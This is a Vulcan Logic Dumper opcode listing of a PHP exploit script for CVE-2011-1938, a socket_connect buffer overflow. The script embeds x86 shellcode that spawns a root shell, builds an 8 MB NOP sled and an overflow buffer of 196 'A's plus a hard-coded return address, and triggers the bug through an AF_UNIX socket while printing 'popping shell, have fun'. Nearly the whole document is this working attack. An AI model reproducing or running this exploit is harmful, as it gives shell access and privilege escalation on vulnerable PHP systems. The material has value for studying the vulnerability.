Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 30 Branch analysis from position: 30 2 jumps found. (Code = 44) Position 1 = 33, Position 2 = 25 Branch analysis from position: 33 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 25 2 jumps found. (Code = 44) Position 1 = 33, Position 2 = 25 Branch analysis from position: 33 Branch analysis from position: 25 filename: /in/Aim44 function name: (null) number of ops: 55 compiled vars: !0 = $SHELLCODE, !1 = $CODE, !2 = $i, !3 = $j, !4 = $b, !5 = $var79, !6 = $var85 line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 5 0 E > ECHO '%5B%2B%5D+CVE-2011-1938' 6 1 ECHO '%5B%2B%5D+there+we+go...%0A' 7 2 INIT_FCALL 'define' 3 SEND_VAL 'EVIL_SPACE_ADDR' 4 SEND_VAL '%FF%FF%EE%B3' 5 DO_ICALL 8 6 INIT_FCALL 'define' 7 SEND_VAL 'EVIL_SPACE_SIZE' 8 SEND_VAL 8388608 9 DO_ICALL 9 10 ASSIGN !0, 'j1X%99%CD%80%89%C3%89%C1jFX%CD%80%B0%0BRhn%2Fshh%2F%2Fbi%89%E3%89%D1%CD%80' 13 11 ECHO '%5B%2B%5D+creating+the+sled.%0A' 15 12 INIT_FCALL 'str_repeat' 13 SEND_VAL '%90' 14 FETCH_CONSTANT ~10 'EVIL_SPACE_SIZE' 15 SEND_VAL ~10 16 DO_ICALL $11 17 ASSIGN !1, $11 16 18 ASSIGN !2, 0 19 FETCH_CONSTANT ~14 'EVIL_SPACE_SIZE' 20 STRLEN ~15 !0 21 SUB ~16 ~14, ~15 22 SUB ~17 ~16, 1 23 ASSIGN !3, ~17 24 > JMP ->30 18 25 > FETCH_DIM_R ~20 !0, !2 26 ASSIGN_DIM !1, !3 27 OP_DATA ~20 17 28 PRE_INC !2 29 PRE_INC !3 30 > STRLEN ~23 !0 31 IS_SMALLER !2, ~23 32 > JMPNZ ~24, ->25 21 33 > INIT_FCALL 'str_repeat' 34 SEND_VAL 'A' 35 SEND_VAL 196 36 DO_ICALL $25 37 FETCH_CONSTANT ~26 'EVIL_SPACE_ADDR' 38 CONCAT ~27 $25, ~26 39 ASSIGN !4, ~27 22 40 INIT_FCALL_BY_NAME 'socket_create' 41 FETCH_CONSTANT ~29 'AF_UNIX' 42 SEND_VAL_EX ~29 43 FETCH_CONSTANT ~30 'SOCK_STREAM' 44 SEND_VAL_EX ~30 45 SEND_VAL_EX 1 46 DO_FCALL 0 $31 47 ASSIGN !5, $31 23 48 ECHO '%5B%2B%5D+popping+shell%2C+have+fun+%28if+you+picked+the+right+address...%29%0A' 24 49 INIT_FCALL_BY_NAME 'socket_connect' 50 SEND_VAR_EX !5 51 SEND_VAR_EX !4 52 DO_FCALL 0 $33 53 ASSIGN !6, $33 25 54 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0